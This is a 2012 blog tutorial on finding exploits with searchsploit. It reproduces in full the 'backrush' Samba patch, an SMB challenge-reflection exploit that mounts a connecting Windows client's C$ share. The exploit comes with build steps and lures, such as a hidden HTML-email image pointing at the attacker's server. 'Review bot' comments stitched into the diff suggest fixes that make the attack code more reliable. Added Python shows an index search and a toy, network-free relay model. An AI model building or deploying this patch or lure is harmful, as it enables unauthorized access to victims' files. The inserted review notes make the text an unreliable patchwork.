Friday, 27 January 2012

How to access exploits on Exploit-DB



The sentence in brackets is taken from Wikipedia's definition of a vulnerability:

(the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw)

Let's start. There are two common ways to scan every IP on the network, Nessus and nmap; here I use Nessus.

Above is the Nessus scan result. The host with the most open ports is 192.168.0.67; double-clicking 192.168.0.67 shows:

Double-clicking the SMB entry shows:

and the information report for port 139/tcp (the NetBIOS session service that carries SMB) is displayed.

The plugin report can be seen here as well.
Then we look for a matching exploit with the Exploit-DB search tool in BackTrack (Exploitation Tools > Open Source Exploitation > exploitdb) and run the command:

root@bt:/pentest/exploits/exploitdb# ./searchsploit smb
which prints:

Description                                                                         Path
----------------------------------------------------------------------------------- -------------------------
MS Windows SMB Authentication Remote Exploit                                        /windows/remote/20.txt
Linux pam_lib_smb < 1.1.6 /bin/login Remote Exploit                                 /linux/remote/89.c
MS Windows (SMB) Transaction Response Handling Exploit (MS05-011)                   /windows/dos/1065.c
MS Windows XP/2K (Mrxsmb.sys) Privilege Escalation PoC (MS06-030)                   /windows/local/1911.c
Links 1.00pre12 (smbclient) Remote Code Execution Exploit                           /multiple/remote/2784.html
smbftpd 0.96 SMBDirList-function Remote Format String Exploit                       /linux/remote/4478.c
Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit                      /osX/local/4759.c
Samba (client) receive_smb_raw() Buffer Overflow Vulnerability PoC                  /multiple/dos/5712.pl
MS Windows WRITE_ANDX SMB command handling Kernel DoS (meta)                        /windows/dos/6463.rb
SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068)                                /windows/remote/7125.txt
VideoLAN VLC Media Player 0.9.9 smb:// URI Stack BOF PoC                            /windows/dos/9029.rb
VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit                      /windows/remote/9303.c
VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit (univ)               /windows/remote/9318.py
VLC Media Player 1.0.0/1.0.1 smb:// URI Handling BOF PoC                            /windows/dos/9427.py
Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln                  /windows/dos/9594.txt
VLC Media Player 1.0.2 smb:// URI stack overflow PoC                                /windows/remote/9816.py
VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC                /windows/dos/10333.py
Proof of Concept for MS10-006 SMB Client-Side Bug                                   /windows/dos/12258.py
Windows 7/2008R2 SMB Client Trans2 Stack Overflow 10-020 PoC                        /windows/dos/12273.py
Windows SMB2 Negotiate Protocol (0x72) Response DOS                                 /windows/dos/12524.py
Netware SMB Remote Stack Overflow PoC                                               /novell/dos/13906.txt
Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054)                         /windows/dos/14607.py
Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050)    /windows/remote/14674.txt
smbind <= v.0.4.7 SQL Injection Vulnerability                                       /php/webapps/14884.txt
VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC      /windows/dos/14892.py
Microsoft Windows SMB Relay Code Execution                                          /windows/remote/16360.rb
Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference               /windows/remote/16363.rb
Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)                        /windows/remote/16366.rb
VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow                              /windows/local/16678.rb

This listing is where we look over the exploits that exist for the service and decide which one to use.
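As an added example (not from the original post and not the Exploit-DB project's own code), here is a small Python version of what the 2012-era searchsploit script did: grep the files.csv index that ships with the exploitdb tree. The index excerpt below is constructed from the listing above with an assumed column layout (id,file,description,platform,type); the real files.csv carries more columns. Going a step beyond plain searchsploit, it ANDs several search terms and filters by platform and exploit type, which is how one cuts the list down to remote Windows exploits once the scan has told you the target OS. It also shows why the listing above contains unrelated entries: a plain substring match on "smb" pulls in Mrxsmb and smbind too.

```python
import csv
import io

# Constructed excerpt of the files.csv index that searchsploit greps. The rows
# are taken from the listing above; the column layout (id,file,description,
# platform,type) is an assumption made for this example and omits the
# date/author/port columns of the real index.
FILES_CSV = """\
id,file,description,platform,type
20,platforms/windows/remote/20.txt,"MS Windows SMB Authentication Remote Exploit",windows,remote
89,platforms/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 /bin/login Remote Exploit",linux,remote
1065,platforms/windows/dos/1065.c,"MS Windows (SMB) Transaction Response Handling Exploit (MS05-011)",windows,dos
1911,platforms/windows/local/1911.c,"MS Windows XP/2K (Mrxsmb.sys) Privilege Escalation PoC (MS06-030)",windows,local
7125,platforms/windows/remote/7125.txt,"SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068)",windows,remote
9594,platforms/windows/dos/9594.txt,"Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln",windows,dos
14884,platforms/php/webapps/14884.txt,"smbind <= v.0.4.7 SQL Injection Vulnerability",php,webapps
16360,platforms/windows/remote/16360.rb,"Microsoft Windows SMB Relay Code Execution",windows,remote
"""


def search_exploits(*terms, platform=None, kind=None, index=FILES_CSV):
    """Case-insensitive AND match of every term against the description column,
    optionally restricted to one platform (windows, linux, php, ...) and one
    exploit type (remote, local, dos, webapps). Returns the matching rows."""
    wanted = [t.lower() for t in terms]
    hits = []
    for row in csv.DictReader(io.StringIO(index)):
        text = row["description"].lower()
        if not all(t in text for t in wanted):
            continue
        if platform is not None and row["platform"] != platform:
            continue
        if kind is not None and row["type"] != kind:
            continue
        hits.append(row)
    return hits


def format_table(rows):
    """Render rows the way searchsploit prints them: description column, then path."""
    width = max((len(r["description"]) for r in rows), default=len("Description"))
    lines = [f"{'Description':<{width}}  Path", f"{'-' * width}  {'-' * 25}"]
    for r in rows:
        # searchsploit prints the path relative to the platforms/ directory
        path = r["file"].removeprefix("platforms")
        lines.append(f"{r['description']:<{width}}  {path}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_table(search_exploits("smb")))
    print()
    # Narrow to what matters for a Windows host with 139/tcp open
    print(format_table(search_exploits("smb", platform="windows", kind="remote")))
```

Run it as-is to see the full "smb" hit list followed by the three remote Windows entries; swap FILES_CSV for the contents of the real files.csv (after adjusting the column names) to use it against the actual index.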

Next we run the command:

root@bt:/pentest/exploits/exploitdb# cat platforms/windows/remote/20.txt
##########################################

# Exploit for "Authentication flaw in Windows SMB protocol" #

##########################################

# Release Date:

# April 24, 2003

#

# Code by Haamed Gheibi (haamed@linux.ce.aut.ac.ir)

# Salman Niksefat (salman@linux.ce.aut.ac.ir)

#

# Systems Affected by this exploit:

# Windows 2000 (SP0 SP1 SP2 SP3)

# Windows XP (SP0 SP1)

#

# EXPLOIT PROVIDED FOR EDUCATIONAL PURPOSES ONLY AS A PROOF OF CONCEPT

# WE TAKE NO RESPONSIBILITY FOR USE OF THIS CODE.

##########################################



This exploit is based on samba-2.2.8a, you can download the source code from:

http://us1.samba.org/samba/ftp/samba-2.2.8a.tar.bz2

or other mirrors.



First you should configure and make samba source code as follow:

You need first to extract the file:

$ tar -jxf samba-2.2.8a.tar.bz2

$ cd samba-2.2.8a/source



Here you need to configure with suitable options. Here is a config for RedHat 9:

$ ./configure --sysconfdir=/etc --with-codepagedir=/usr/share/samba/codepages\

--with-lockdir=/var/cache/samba --with-configdir=/etc/samba



$ make

$ make bin/smbmount

$ su

# make install



First add an arbitrary user to samba: (Choose a reliable password for it for your protection!)

# smbadduser smbtmpuser:root



Now check if your samba server (bin/smbd) and client (bin/smbmount) are working,

and that ipchains rules are not set. You can use:

# service smbd stop

# bin/smbd -i

# ipchains -F



Well, now if everything works fine, you can apply the exploit code to the source.

Download it from: http://seclab.ce.aut.ac.ir/samba-exp/exploit/backrush.patch

# patch < backrush.patch



Make it again:

# make bin/smbd

# make bin/smbmount

[Note that you shouldn't make the whole of samba, because you may get linker errors]



Make necessary directories:

# mkdir -p bin/backrush/log

# mkdir bin/backrush/mnt

# touch bin/backrush/ip2sharename.map



Now we are done, you MUST change directory to bin and run the server:

# cd bin

# killall -9 smbd

# ./smbd



Now by default, the C$ share of any Windows machine that tries to connect

to this SMB server will be mounted under mnt/machinename-random.

If you want to mount another share folder, you can add an entry to ip2sharename.map file as follow:

IPADDRESS:SHARENAME

This option is suitable for XP systems.



Two ways to force a client to automatically connect to your modified SMB server:

1. Send him/her a HTML email with the following tag:

<IMG src='\\smb-server\nofile.gif' width=1 height=1>



2. Invite him/her to visit your personal web page.

You can make it by the above tag, then pray and wait until he/she visits your page. ;)



Enjoy!





* backrush.patch *





diff -Nur /root/samba-2.2.8a/source/client/smbmount.c /backrush/source.exp/client/smbmount.c

--- /root/samba-2.2.8a/source/client/smbmount.c 2002-04-30 17:56:19.000000000 +0430

+++ /backrush/source.exp/client/smbmount.c 2003-04-19 16:28:04.000000000 +0430

@@ -26,6 +26,10 @@

#include <mntent.h>

#include <asm/types.h>

#include <linux/smb_fs.h>

+//>Backrush

+int br_read[2], br_write[2], br_pid;

+struct Backrush br_state;

+//<



extern BOOL in_client;

extern pstring user_socket_options;
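Review bot: nothing in this hunk initialises br_read or br_write, so until the getenv() block later in main() sets them they are 0, and the read()/write() calls added in cliconnect.c and further down in this file would use fd 0 (stdin) whenever BACKRUSH_READ/BACKRUSH_WRITE are unset. Initialise both to -1 and refuse to enter the Backrush path while they are still -1, or document that the patched smbmount only works when launched by the patched smbd.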

@@ -177,6 +181,21 @@

cli_shutdown(c);

return NULL;

}

+//>Backrush

+ {

+ int i;

+ printf("challange: ");

+ for (i = 0; i < 8; i++)

+ printf("%0.2x",c->cryptkey[i]);

+ fflush(stdout);

+ memcpy(br_state.challenge, c->cryptkey, 8);

+ br_state.status = 1;

+ write(br_write[1],&br_state, sizeof(br_state));

+ printf(" sent to server\n");

+ printf("waiting for response...\n");

+ fflush(stdout);

+ }

+//<



if (!got_pass) {

char *pass = getpass("Password: ");
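Review bot: the challenge dump does printf("%0.2x", c->cryptkey[i]) on a plain char array, so any byte >= 0x80 is sign-extended and printed as eight digits (ffffff80 style); cast to (unsigned char) before printing, and the same applies to the hex loops added in cliconnect.c. The write() of br_state to br_write[1] also discards its return value; a short write leaves the smbd side reading a partial struct, so check that it returned sizeof(br_state) and abort otherwise.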

@@ -848,6 +867,14 @@

if (*credentials != 0) {

read_credentials_file(credentials);

}

+//>Backrush

+ printf("Started to mount %s on %s\n",argv[1], argv[2]);

+ fflush(stdout);

+ if (getenv("BACKRUSH_READ"))

+ br_read[0] = atoi(getenv("BACKRUSH_READ"));

+ if (getenv("BACKRUSH_WRITE"))

+ br_write[1] = atoi(getenv("BACKRUSH_WRITE"));

+//<



DEBUG(3,("mount.smbfs started (version %s)\n", VERSION));
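Review bot: atoi() on BACKRUSH_READ/BACKRUSH_WRITE silently yields 0 for an empty or non-numeric value, which then selects stdin as the pipe end; parse with strtol() and check endptr, and fail loudly when either variable is missing. A comment saying that these descriptors are the pipe() ends created in the patched negprot.c would also help, since nothing here explains where the numbers come from.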



diff -Nur /root/samba-2.2.8a/source/include/includes.h /backrush/source.exp/include/includes.h

--- /root/samba-2.2.8a/source/include/includes.h 2003-02-28 19:26:18.000000000 +0330

+++ /backrush/source.exp/include/includes.h 2003-04-17 10:36:54.000000000 +0430

@@ -1,5 +1,26 @@

#ifndef _INCLUDES_H

#define _INCLUDES_H

+

+//>Backrush

+#include <stdlib.h>

+#include <time.h>

+struct Backrush

+{

+ int status;

+ char ip_address[20];

+ int port;

+ char username[256];

+ char sharename[256];

+ char netbios[256];

+ char domain[256];

+ char challenge[8];

+ char nt_resp[24];

+ char lm_resp[24];

+};

+extern struct Backrush br_state;

+extern int br_read[2],br_write[2],br_pid;

+//<

+

/*

Unix SMB/Netbios implementation.

Version 1.9.
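Review bot: the field named port holds the random() value that negprot.c uses as a directory suffix, not a TCP port, which misleads anyone reading password.c later; rename it (session_id, say) and document that the struct is shipped raw over a pipe between two processes built from the same tree, so its layout must stay identical in smbd and smbmount. challenge, nt_resp and lm_resp are fixed-length binary fields, which is fine, but username, sharename and domain are filled with strncpy() elsewhere in the patch with no guaranteed NUL; reserve the last byte or terminate explicitly.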

diff -Nur /root/samba-2.2.8a/source/libsmb/cliconnect.c /backrush/source.exp/libsmb/cliconnect.c

--- /root/samba-2.2.8a/source/libsmb/cliconnect.c 2003-03-15 01:04:48.000000000 +0330

+++ /backrush/source.exp/libsmb/cliconnect.c 2003-04-17 12:30:26.000000000 +0430

@@ -23,7 +23,6 @@



#include "includes.h"



-

static const struct {

int prot;

const char *name;
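Review bot: this hunk only deletes a blank line after #include "includes.h" and is unrelated to the change; drop it so the diff stays limited to the Backrush code.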

@@ -265,7 +264,28 @@

memcpy(pword, pass, passlen);

memcpy(ntpword, ntpass, ntpasslen);

}

-

+//>Backrush

+ {

+ int i;

+ read(br_read[0],&br_state, sizeof(br_state));

+ printf("received response:\n");

+ fflush(stdout);

+ memcpy(pword, br_state.lm_resp, 24);

+ memcpy(ntpword, br_state.nt_resp, 24);

+ if(br_state.username[0])

+ strncpy(user, br_state.username, 24);

+ printf("username: %s\n", user);

+ printf("lm response: ");

+ for (i = 0; i < 24; i++)

+ printf("%0.2x",pword[i]);

+ printf("\n");

+ printf("nt response: ");

+ for (i = 0; i < 24; i++)

+ printf("%0.2x",ntpword[i]);

+ printf("\n");

+ fflush(stdout);

+ }

+//<

/* send a session setup command */

memset(cli->outbuf,'\0',smb_size);
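Review bot: the read(br_read[0], ...) is unchecked, so EOF or a short read leaves pword/ntpword and user holding whatever was in br_state and the session setup goes out with garbage; verify the return value equals sizeof(br_state). strncpy(user, br_state.username, 24) copies at most 24 bytes of a 256-byte field into a caller-owned buffer whose size this function does not know, and leaves it unterminated when the name is 24 characters or longer; use the destination's size and force a terminator. The hex loops have the same signed-char problem as in smbmount.c and should cast to unsigned char.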



diff -Nur /root/samba-2.2.8a/source/smbd/negprot.c /backrush/source.exp/smbd/negprot.c

--- /root/samba-2.2.8a/source/smbd/negprot.c 2003-03-15 01:04:49.000000000 +0330

+++ /backrush/source.exp/smbd/negprot.c 2003-04-24 13:37:19.000000000 +0430

@@ -180,6 +180,45 @@

doencrypt = ((cli->sec_mode & 2) != 0);

}



+//>Backrush

+ {

+ srand(time(NULL));

+ pipe(br_read);

+ pipe(br_write);

+ br_state.status = 1;

+ br_state.port = random();

+ strncpy(br_state.ip_address, get_socket_addr(smbd_server_fd()), sizeof(br_state.ip_address));

+ strncpy(br_state.sharename, "c$", sizeof(br_state.sharename));

+ {

+ char tmp[1024], *ptr;

+ FILE *fin = fopen("backrush/ip2sharename.map","r");

+ if (fin)

+ {

+ while(fscanf(fin, "%s", tmp) > 0)

+ {

+ ptr = strchr(tmp, ':');

+ *ptr++ = 0;

+ if (!strcmp(br_state.ip_address,tmp))

+ strncpy(br_state.sharename, ptr, sizeof(br_state.sharename));

+ }

+ fclose(fin);

+ }

+ }

+ if (!(br_pid = fork()))

+ {

+ char cmd[1024];

+ snprintf(cmd, sizeof cmd, "mkdir -p backrush/mnt/%s-%d", br_state.ip_address, br_state.port);

+ system(cmd);

+ snprintf(cmd, sizeof cmd, "export BACKRUSH_READ=%d; export BACKRUSH_WRITE=%d;

./smbmount //%s/%s backrush/mnt/%s-%d -o username=root,password=let_me_go_in

>backrush/log/%s-%d",

+ br_write[0], br_read[1], br_state.ip_address, br_state.sharename, br_state.ip_address,

br_state.port, br_state.ip_address, br_state.port);

+ system(cmd);

+ snprintf(cmd, sizeof cmd, "echo smbmount compeleted >>backrush/log/%s-%d",

br_state.ip_address, br_state.port);

+ system(cmd);

+ _exit(0);

+ }

+ }

+//<

+

if (doencrypt) {

crypt_len = 8;

if (!cli) {
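Review bot: srand(time(NULL)) seeds rand(), but br_state.port is taken from random(), which is seeded by srandom(); every forked smbd child starts from the same unseeded random() state, so concurrent victims get the same suffix and collide on the same mnt/<ip>-<n> directory and log file. Use srandom() or, better, getpid(). In the ip2sharename.map loop, strchr(tmp, ':') returns NULL for a line without a colon and the following *ptr++ = 0 then dereferences NULL; fscanf("%s", tmp) into a 1024-byte buffer has no width limit (use "%1023s"); and both br_state.sharename and ip_address are interpolated unescaped into a system() command, so a map entry is effectively shell input. The child also inherits both ends of both pipes and never closes the unused ones, and the smbmount password let_me_go_in appears on the command line visible in ps; pass it through a credentials file instead.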

diff -Nur /root/samba-2.2.8a/source/smbd/password.c /backrush/source.exp/smbd/password.c

--- /root/samba-2.2.8a/source/smbd/password.c 2003-04-07 06:24:00.000000000 +0430

+++ /backrush/source.exp/smbd/password.c 2003-04-19 09:15:47.000000000 +0430

@@ -48,6 +48,10 @@

unsigned char buf[8];



generate_random_buffer(buf,8,False);

+//>Backrush

+ read(br_read[0],&br_state, sizeof(br_state));

+ memcpy(buf, br_state.challenge, 8);

+//<



memcpy(saved_challenge, buf, 8);

memcpy(challenge,buf,8);
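Review bot: the read() that replaces the freshly generated challenge is unchecked; if the smbmount side has not written yet the call blocks smbd inside negprot, and if it returns short or fails buf keeps the random bytes while br_state.challenge is stale, so the victim answers a challenge nobody relayed. Check the return against sizeof(br_state) and fail the negotiate instead of continuing with generate_random_buffer()'s output, which is now computed only to be overwritten.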

@@ -466,7 +470,13 @@

uchar challenge[8];

char* user_name;

uint8 *nt_pw, *lm_pw;

-

+//>Backrush

+ memcpy(br_state.nt_resp, nt_pass, 24);

+ memcpy(br_state.lm_resp, lm_pass, 24);

+ write(br_write[1],&br_state, sizeof(br_state));

+// waitpid(br_pid,NULL,WNOHANG);

+ return(False);

+//<

if (!lm_pass || !sampass)

return(False);
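Review bot: the new memcpy() calls run before the existing if (!lm_pass || !sampass) return(False) check, so a client that sends only an LM response (nt_pass == NULL) or a blob shorter than 24 bytes makes smbd read from NULL or past the end of the buffer; move the copies after that check and also verify both lengths are 24. The commented-out waitpid() means the child forked in negprot.c is never reaped, so every inbound connection leaves a zombie until that smbd exits.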



diff -Nur /root/samba-2.2.8a/source/smbd/reply.c /backrush/source.exp/smbd/reply.c

--- /root/samba-2.2.8a/source/smbd/reply.c 2003-04-07 06:24:00.000000000 +0430

+++ /backrush/source.exp/smbd/reply.c 2003-04-16 18:03:58.000000000 +0430

@@ -974,6 +974,11 @@

* security=domain.

*/



+//>Backrush

+ strncpy(br_state.username,user,sizeof(br_state.username));

+ strncpy(user,"root",sizeof(br_state.username));

+//<

+

if (!guest && !check_server_security(orig_user, domain, user,

smb_apasswd, smb_apasslen, smb_ntpasswd, smb_ntpasslen) &&

!check_domain_security(orig_user, domain, user, smb_apasswd,
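Review bot: strncpy(user, "root", sizeof(br_state.username)) bounds the copy by the size of a different buffer; it only works because user happens to be an fstring of the same 256 bytes. Use sizeof(user) (or fstrcpy) so the bound follows the destination. The saved username is likewise copied into a 256-byte field with no guaranteed terminator; sizeof - 1 plus an explicit NUL would do. A comment saying why the authenticating user is swapped for the local root account added with smbadduser would help the next reader.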

diff -Nur /root/samba-2.2.8a/source/smbd/server.c /backrush/source.exp/smbd/server.c

--- /root/samba-2.2.8a/source/smbd/server.c 2003-03-15 01:04:49.000000000 +0330

+++ /backrush/source.exp/smbd/server.c 2003-04-16 18:05:17.000000000 +0430

@@ -25,6 +25,11 @@

extern fstring global_myworkgroup;

extern pstring global_myname;



+//<Backrush

+int br_read[2],br_write[2],br_pid;

+struct Backrush br_state;

+//>

+

int am_parent = 1;



/* the last message the was processed */
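Review bot: the marker comments are reversed here (//<Backrush ... //>) compared with //>Backrush ... //< everywhere else in the patch; make them consistent so the added regions can be grepped. These globals duplicate the definitions in smbmount.c, which is fine only because the two files never link into the same binary; a comment noting that would stop someone later linking both and getting duplicate-symbol errors.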



# milw0rm.com [2003-04-25]

This is the point where we read the exploit script itself.
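As an added example that is not part of the original post or of the backrush exploit, the following Python models the control flow that the patch above wires into smbd and smbmount: the victim connects to the attacker's SMB server, the server connects back to the victim, hands the victim its own challenge, and replays the LM/NT responses it receives on the outbound session. The LM/NT computation is replaced by an HMAC stand-in (the real thing is DES over the password hash), the user and password are made up, and the reflection_guard flag stands for the kind of check MS08-068 introduced, where the client refuses to answer a challenge its own server has outstanding. Nothing here touches a network.

```python
import hashlib
import hmac
import secrets


def toy_response(password: str, challenge: bytes) -> bytes:
    """Stand-in for the 24-byte LM/NT response. Real clients DES-encrypt the
    challenge under the password hash; HMAC-SHA256 keyed by a hash of the
    password is used here so the example needs only the standard library.
    What matters for the attack is preserved: the answer depends on the
    password and the challenge, and whoever relays it never needs the password."""
    key = hashlib.sha256(password.encode("utf-16-le")).digest()
    return hmac.new(key, challenge, hashlib.sha256).digest()[:24]


class VictimHost:
    """A single Windows box acting as SMB server (issues challenges) and SMB
    client (answers them). Credentials are made up for this example."""

    def __init__(self, username: str, password: str, reflection_guard: bool = False):
        self.username = username
        self._password = password
        self.reflection_guard = reflection_guard
        self._outstanding = set()   # challenges issued to sessions still awaiting auth

    # ---- server role -------------------------------------------------------
    def server_negotiate(self) -> bytes:
        """Negotiate Protocol reply: issue a fresh 8-byte challenge."""
        challenge = secrets.token_bytes(8)
        self._outstanding.add(challenge)
        return challenge

    def server_session_setup(self, challenge: bytes, username: str, response: bytes) -> bool:
        """Session Setup: accept only a correct response to a challenge we issued."""
        if challenge not in self._outstanding:
            return False
        self._outstanding.discard(challenge)
        if username != self.username:
            return False
        return hmac.compare_digest(response, toy_response(self._password, challenge))

    # ---- client role -------------------------------------------------------
    def client_session_setup(self, challenge: bytes):
        """Answer a server's challenge with the logged-on user's credentials.
        With reflection_guard on, refuse a challenge this host itself has
        outstanding (the MS08-068 style check); without it, answer blindly the
        way the Windows 2000/XP builds listed in the exploit header did."""
        if self.reflection_guard and challenge in self._outstanding:
            raise ConnectionRefusedError("challenge was issued by this host; reflection refused")
        return self.username, toy_response(self._password, challenge)


class RelayServer:
    """The patched smbd/smbmount pair from the exploit, reduced to its control flow."""

    def __init__(self):
        self.log = []

    def handle_inbound(self, victim: VictimHost) -> bool:
        # negprot.c: before replying to the victim's Negotiate, fork smbmount,
        # connect back to the victim and take the challenge its server issues.
        challenge = victim.server_negotiate()
        self.log.append(("outbound negprot, victim challenge", challenge.hex()))
        # password.c get_challenge(): send that same challenge back to the
        # victim in our own Negotiate reply instead of a random one.
        try:
            user, response = victim.client_session_setup(challenge)
        except ConnectionRefusedError as err:
            self.log.append(("inbound session setup refused", str(err)))
            return False
        self.log.append(("inbound session setup from", user, response.hex()))
        # password.c smb_password_ok() -> cliconnect.c: hand the LM/NT blobs
        # to smbmount, which finishes the outbound session setup with them.
        accepted = victim.server_session_setup(challenge, user, response)
        self.log.append(("outbound session setup", "accepted" if accepted else "rejected"))
        return accepted


def demo():
    """Relay against an unguarded host and against one with the reflection check."""
    unpatched = VictimHost("alice", "correct horse battery staple")
    patched = VictimHost("alice", "correct horse battery staple", reflection_guard=True)
    return RelayServer().handle_inbound(unpatched), RelayServer().handle_inbound(patched)


if __name__ == "__main__":
    unguarded, guarded = demo()
    print("relay against unguarded host:", unguarded)   # logged in as alice without her password
    print("relay against guarded host:", guarded)
```

The relay never computes anything itself; it only needs the inbound and outbound sessions to share one challenge, which is exactly what the read()/write() pairs over the pipe in the patch arrange. The guard shows why the fix had to be on the client side: the server cannot tell a reflected response from a genuine one.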
